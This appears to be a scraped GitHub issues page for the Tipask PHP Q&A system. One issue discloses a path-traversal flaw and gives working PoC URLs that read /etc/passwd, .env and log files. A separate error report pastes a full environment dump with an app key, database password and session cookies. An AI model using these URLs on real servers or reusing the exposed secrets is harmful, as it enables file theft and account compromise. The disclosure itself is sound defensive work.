sdfsky / tipask Goto Github PK
View Code? Open in Web Editor NEWTipask是一款开放源码的PHP问答系统,基于Laravel框架开发,容易扩展,具有强大的负载能力和稳定性。
Home Page: http://www.tipask.com
Tipask是一款开放源码的PHP问答系统,基于Laravel框架开发,容易扩展,具有强大的负载能力和稳定性。
Home Page: http://www.tipask.com
3.5.9
, which fails to validate the path parameters entered by the user when downloading attachments, **a registered user can download arbitratry file on the Tipask server, **such as .env
, /etc/passwd
, laravel.log
and so on, casuing infomation leakage.Qi'An Xin Technology Group, Network Security Department, Product-Security Team
Official Site:https://www.tipask.com/
Github Repo:https://github.com/sdfsky/tipask
Source code could be download at:https://www.tipask.com/release/Tipask_v3.5.8_UTF8_20210620.zip
Tipask ≤ 3.5.8
2021/09/17
, and has patched it via commit 9b5f13,users are able to apply the patch to avoid this vuln.Once you've registered and logged in, you can access the following address directly:
For Linux Server, the PoC is as follows
http://tipask/attach/download/..-..-..-..-..-..-..-etc-hosts
https://tipask/attach/download/..-..-.env
http://tipask/attach/download/..-logs-laravel.log
http://tipask/attach/download/..-..-..-..-..-..-..-etc-passwd
The vulnerability involves 1 file:
app\Http\Controllers\AttachController.php
path traversal due to no param-check.
Here are sensitive infomation that's downloaded via the vuln.
Of course,mitigations easy to imply:
basename()
to process the user's input parameters..
】The vendor has CONFIRMED this vulnerability in 2021/09/17
, and has patched it via commit 9b5f13,users are able to apply the patch to avoid this vuln.
如题所示,我没有在后台看到设置的入口。
版本:最新版
commit f4752c5
错误页面:
admin/setting/email
错误简述:
Whoops, looks like something went wrong.
ErrorException in Setting.php line 45:
Array to string conversion
错误栈:
in Setting.php line 45
at HandleExceptions->handleError('8', 'Array to string conversion', '/var/www/html/app/Models/Setting.php', '45', array('env_path' => '/var/www/html/.env', 'env_content' => 'APP_DEBUG=true APP_ENV=local APP_KEY=mnbl2zciiMg9qjFDaDzLAKIFUT2MR5Gv CONTENT_LENGTH=303 CONTENT_TYPE=application/x-www-form-urlencoded DB_DATABASE=tipaskx DB_HOST=db DB_PASSWORD=password1 DB_PORT=3306 DB_PREFIX=ask_ DB_USER=tipaskdb DB_USERNAME=tipaskdb DEVEL_KIT_MODULE_VERSION=0.3.0 DOCUMENT_ROOT=/var/www/html/public DOCUMENT_URI=/index.php FCGI_ROLE=RESPONDER GATEWAY_INTERFACE=CGI/1.1 GPG_KEYS=CBAF69F173A0FEA4B537F470D66C9593118BCCB6 F38252826ACD957EF380D39F2F7956BC5DA04B5D HOME=/var/cache/nginx HOSTNAME=f4581309a5d8 HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3 HTTP_ACCEPT_ENCODING=gzip, deflate HTTP_ACCEPT_LANGUAGE=zh-CN,zh;q=0.9,en;q=0.8,zh-TW;q=0.7 HTTP_CACHE_CONTROL=max-age=0 HTTP_CONNECTION=keep-alive HTTP_CONTENT_LENGTH=303 HTTP_CONTENT_TYPE=application/x-www-form-urlencoded HTTP_COOKIE=bmd__Session=72dbf41355aa22cda0b676c9b7932d6c; UM_distinctid=16c897725106d4-09e4718f94c8ff-37c153e-144000-16c89772511b71; CNZZDATA1273638993=1321489185-1565669051-http%253A%252F%252F192.168.106.128%253A8080%252F%7C1565674454; bmd__user_login=2LL7Xn6FE1RhNWMKTamIiINQh%2FZgEFDXjcRtXtlLA%2BSHspsToZBFESNeTqfRuTzE%2B%2BrbpjKBsqGlOxs9zfFFkIPZBS95Ttm8uJQpcoZdwllYizB5Y2Sag0TUzKlrvyUq; remember_82e5d2c56bdd0811318f0cf078b78bfc=eyJpdiI6InlLSkhRaUlmaWFtdEN4MlJUMmJtMlE9PSIsInZhbHVlIjoiK0J0SWtzSkJ3SDBtSEc0UkZcLzQzMTVpdTMzcFpUajZjQjdZYVhKYXRXWnE3UzlWQXdmSVRQamJOTXJsY1dZVDBFSTU4OFwvZlJYZzJyYWt6VHM4NHdIOUJ2b2p4ZE9PRHExXC9USktIeFc3Tm89IiwibWFjIjoiZjc0MjFhOTZhZjNjNThjNTIxYjRiZDYxYmY3MGNiNGUzMzhmNzY1YTBkYmM3Y2Q5YTdlOGJmNzQwZDM2ZjFhZSJ9; XSRF-TOKEN=eyJpdiI6IjRES2lEOEJUT2NURmRrMzI4RlI4U3c9PSIsInZhbHVlIjoiVkZPdGxnbFpodnNcL212MUFHSm5wcllFVzZJOVhGUnVaVVwvR3JsaCthcm51XC9UNFNjUk83dlJiUEJZdXQ2dFwveGpMck5uYlMrTWRrWThqQTN0TXdQMUJnPT0iLCJtYWMiOiIzZThjMDc5YTVlYmQwMzEzODlhNTQ4OTg5ZWQ4N2E2YTdiZjA2MGI5ZDc1ZTAyYThkMmU1MDY5NTMyYTlhMTA0In0%3D; laravel_session=eyJpdiI6IjUwdlArN2t2ZTN6QUlUUVhxcXBaeGc9PSIsInZhbHVlIjoiZFc1dDVISWpHUnZ4VjhCeHJ2NkU4ZlNpMkh2aXh6VHJjTXdVR0FzbU5yN3JPaEwwMzk4cXFoSjl3WXlHTStxb2NMNUZ1WmIxeW5QYm5EckJGTFhESGc9PSIsIm1hYyI6ImYzMzAxZGMzM2YxZWM0YzM3OWU0YmYyYjBiYmVhZTU1MjRiMzIxOTAxNWZiZmI0OTUzNjViYzc3MDI0OWY5ZDMifQ%3D%3D HTTP_HOST=192.168.106.128:8008 HTTP_ORIGIN=http://192.168.106.128:8008 HTTP_REFERER=http://192.168.106.128:8008/admin/setting/email HTTP_UPGRADE_INSECURE_REQUESTS=1 HTTP_USER_AGENT=Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36 LD_PRELOAD=/usr/lib/preloadable_libiconv.so php LUAJIT_INC=/usr/include/luajit-2.1 LUAJIT_LIB=/usr/lib LUA_MODULE_VERSION=0.10.14 MAIL_DRIVER=smtp MAIL_ENCRYPTION=ssl MAIL_FROM_ADDRESS=[email protected] MAIL_FROM_NAME=qiniu MAIL_HOST=smtp.163.com MAIL_OPEN=0 MAIL_PASSWORD=xxxxx! MAIL_PORT=465 MAIL_SENDMAIL=/usr/sbin/sendmail -bs MAIL_USERNAME=[email protected] NGINX_VERSION=1.16.0 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin PHPIZE_DEPS=autoconf dpkg-dev dpkg file g++ gcc libc-dev make pkgconf re2c PHP_ASC_URL=https://www.php.net/get/php-7.3.8.tar.xz.asc/from/this/mirror PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi PHP_INI_DIR=/usr/local/etc/php PHP_LDFLAGS=-Wl,-O1 -Wl,--hash-style=both -pie PHP_MD5= PHP_SELF=/index.php PHP_SHA256=f6046b2ae625d8c04310bda0737ac660dc5563a8e04e8a46c1ee24ea414ad5a5 PHP_URL=https://www.php.net/get/php-7.3.8.tar.xz/from/this/mirror PHP_VERSION=7.3.8 PWD=/var/www/html QUERY_STRING= REDIRECT_STATUS=200 REMOTE_ADDR=192.168.106.1 REMOTE_PORT=59545 REQUEST_METHOD=POST REQUEST_SCHEME=http REQUEST_TIME=1566270938 REQUEST_TIME_FLOAT=1566270938.8701 REQUEST_URI=/admin/setting/email SCRIPT_FILENAME=/var/www/html/public/index.php SCRIPT_NAME=/index.php SERVER_ADDR=172.29.0.4 SERVER_NAME=_ SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.1 SERVER_SOFTWARE=nginx/1.16.0 SHLVL=1 SUPERVISOR_ENABLED=1 SUPERVISOR_GROUP_NAME=php-fpm SUPERVISOR_PROCESS_NAME=php-fpm SUPERVISOR_SERVER_URL=unix:///dev/shm/supervisor.sock USER=nginx argc=0 ', 'value' => array(), 'key' => 'argv')) in Setting.php line 45
at Setting::writeToEnv() in SettingController.php line 67
at SettingController->email(object(Request))
at call_user_func_array(array(object(SettingController), 'email'), array(object(Request))) in Controller.php line 256
at Controller->callAction('email', array(object(Request))) in ControllerDispatcher.php line 164
at ControllerDispatcher->call(object(SettingController), object(Route), 'email') in ControllerDispatcher.php line 112
at ControllerDispatcher->Illuminate\Routing{closure}(object(Request))
at call_user_func(object(Closure), object(Request)) in Pipeline.php line 139
at Pipeline->Illuminate\Pipeline{closure}(object(Request))
at call_user_func(object(Closure), object(Request)) in Pipeline.php line 102
at Pipeline->then(object(Closure)) in ControllerDispatcher.php line 114
at ControllerDispatcher->callWithinStack(object(SettingController), object(Route), object(Request), 'email') in ControllerDispatcher.php line 68
at ControllerDispatcher->dispatch(object(Route), object(Request), 'App\Http\Controllers\Admin\SettingController', 'email') in Route.php line 203
at Route->runWithCustomDispatcher(object(Request)) in Route.php line 134
at Route->run(object(Request)) in Router.php line 708
at Router->Illuminate\Routing{closure}(object(Request))
at call_user_func(object(Closure), object(Request)) in Pipeline.php line 139
at Pipeline->Illuminate\Pipeline{closure}(object(Request)) in AdminAuthenticate.php line 26
at AdminAuthenticate->handle(object(Request), object(Closure))
at call_user_func_array(array(object(AdminAuthenticate), 'handle'), array(object(Request), object(Closure))) in Pipeline.php line 124
at Pipeline->Illuminate\Pipeline{closure}(object(Request)) in Authenticate.php line 44
at Authenticate->handle(object(Request), object(Closure))
at call_user_func_array(array(object(Authenticate), 'handle'), array(object(Request), object(Closure))) in Pipeline.php line 124
at Pipeline->Illuminate\Pipeline{closure}(object(Request))
at call_user_func(object(Closure), object(Request)) in Pipeline.php line 102
at Pipeline->then(object(Closure)) in Router.php line 710
at Router->runRouteWithinStack(object(Route), object(Request)) in Router.php line 674
at Router->dispatchToRoute(object(Request)) in Router.php line 635
at Router->dispatch(object(Request)) in Kernel.php line 236
at Kernel->Illuminate\Foundation\Http{closure}(object(Request))
at call_user_func(object(Closure), object(Request)) in Pipeline.php line 139
at Pipeline->Illuminate\Pipeline{closure}(object(Request)) in VerifyCsrfToken.php line 50
at VerifyCsrfToken->handle(object(Request), object(Closure))
at call_user_func_array(array(object(VerifyCsrfToken), 'handle'), array(object(Request), object(Closure))) in Pipeline.php line 124
at Pipeline->Illuminate\Pipeline{closure}(object(Request)) in ShareErrorsFromSession.php line 49
at ShareErrorsFromSession->handle(object(Request), object(Closure))
at call_user_func_array(array(object(ShareErrorsFromSession), 'handle'), array(object(Request), object(Closure))) in Pipeline.php line 124
at Pipeline->Illuminate\Pipeline{closure}(object(Request)) in StartSession.php line 62
at StartSession->handle(object(Request), object(Closure))
at call_user_func_array(array(object(StartSession), 'handle'), array(object(Request), object(Closure))) in Pipeline.php line 124
at Pipeline->Illuminate\Pipeline{closure}(object(Request)) in AddQueuedCookiesToResponse.php line 37
at AddQueuedCookiesToResponse->handle(object(Request), object(Closure))
at call_user_func_array(array(object(AddQueuedCookiesToResponse), 'handle'), array(object(Request), object(Closure))) in Pipeline.php line 124
at Pipeline->Illuminate\Pipeline{closure}(object(Request)) in EncryptCookies.php line 59
at EncryptCookies->handle(object(Request), object(Closure))
at call_user_func_array(array(object(EncryptCookies), 'handle'), array(object(Request), object(Closure))) in Pipeline.php line 124
at Pipeline->Illuminate\Pipeline{closure}(object(Request)) in CheckForMaintenanceMode.php line 44
at CheckForMaintenanceMode->handle(object(Request), object(Closure))
at call_user_func_array(array(object(CheckForMaintenanceMode), 'handle'), array(object(Request), object(Closure))) in Pipeline.php line 124
at Pipeline->Illuminate\Pipeline{closure}(object(Request))
at call_user_func(object(Closure), object(Request)) in Pipeline.php line 102
at Pipeline->then(object(Closure)) in Kernel.php line 122
at Kernel->sendRequestThroughRouter(object(Request)) in Kernel.php line 87
at Kernel->handle(object(Request)) in index.php line 53
重现步骤:
在配置完邮箱信息后,点保存
参考PR #5,我个人建议把所有引入的第三方库统一放在一起,都放在/public/static/libs目录下,例如:
引入 https://github.com/fengyuanchen/cropper 的 cropper
Cropper图片截剪库总共有两个文件,分为:
CSS: cropper.min.css
JS: cropper.min.js
在/public/static/libs目录下新建cropper目录,再把两个文件(cropper.min.css和cropper.min.js)放入cropper目录下,再进行分别引入
CSS引入
这样做的好处是可以避免
/public/static/js 目录下出现CSS文件
/public/static/css 目录下出现JS文件
建议新增tag批量生成
composer.lock的依赖文件地址失效,导致composer install的时候提示包download failed。
安装到最后一步报错
SQLSTATE[HY000] [1044] Access denied for user ''@'localhost' to database 'forge' (SQL: select * from
ask_settings where (
name` = website_name) limit 1)
ask_settings
where (name
= website_name) limit 1)in Connection.php line 664
at Connection->runQueryCallback('select * from ask_settings
where (name
= ?) limit 1', array('website_name'), object(Closure))in Connection.php line 624
at Connection->run('select * from ask_settings
where (name
= ?) limit 1', array('website_name'), object(Closure))in Connection.php line 333
at Connection->select('select * from ask_settings
where (name
= ?) limit 1', array('website_name'), true)in Builder.php line 1963
at Builder->runSelect()in Builder.php line 1951
at Builder->Illuminate\Database\Query{closure}()in Builder.php line 2435
at Builder->onceWithColumns(array(''), object(Closure))in Builder.php line 1952
at Builder->get(array(''))in Builder.php line 481
at Builder->getModels(array(''))in Builder.php line 465
at Builder->get(array(''))in BuildsQueries.php line 77
at Builder->first()in Builder.php line 361
at Builder->firstOrNew(array('name' => 'website_name'))in Builder.php line 395
用的宝塔,php7.2, 按照官方的视频安装教程一步一步来的,最后一步就是不成功,实在没辙了,请问如何解决?谢谢
而且 database 'forge' 这个forge数据表拿来干啥的?
前后端完全分离,支持json api
!!
最新3.5.5版本安装正常,但是发表文章时出错,store时出现500内部错误
public下没有install文件夹或者install.php文件。如何安装?
这是个Pull Request的Prepare Issue
优化文件存储(头像、附件)的改进
强烈建议增加wangeditor编辑器
2021-06-28 22:19:54] local.ERROR: Argument 1 passed to str_contains() must be of the type string, null given, called in /var/www/html/QA/app/Models/Setting.php on line 56 {"exception":"[object] (Symfony\Component\Debug\Exception\FatalThrowableError(code: 0): Argument 1 passed to str_contains() must be of the type string, null given, called in /var/www/html/QA/app/Models/Setting.php on line 56 at /var/www/html/QA/vendor/symfony/polyfill-php80/bootstrap.php:29)
[stacktrace]
#0 /var/www/html/QA/app/Models/Setting.php(56): str_contains(NULL, ' ')
没有找到安装、部署相关的说明呢?
版本:tipask 3.3(3.2也是一样)
系统环境:Ubuntu 16.04 + Nginx1.12.2 + php7.2.5
问题描述:用户邮箱验证成功后,前台邮箱设置界面任然显示:您还未进行邮箱绑定,绑定后可通过邮箱地址登录系统.
代码中前面的$paymentChart删除后,后面的代码中的未删除,导致后台首页报错。
return view("admin.index.index")->with(compact('totalUserNum','totalQuestionNum','totalArticleNum','totalAnswerNum','userChart','questionChart','systemInfo','paymentChart'));
一鼓作气 把框架更新到 laravel 6
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.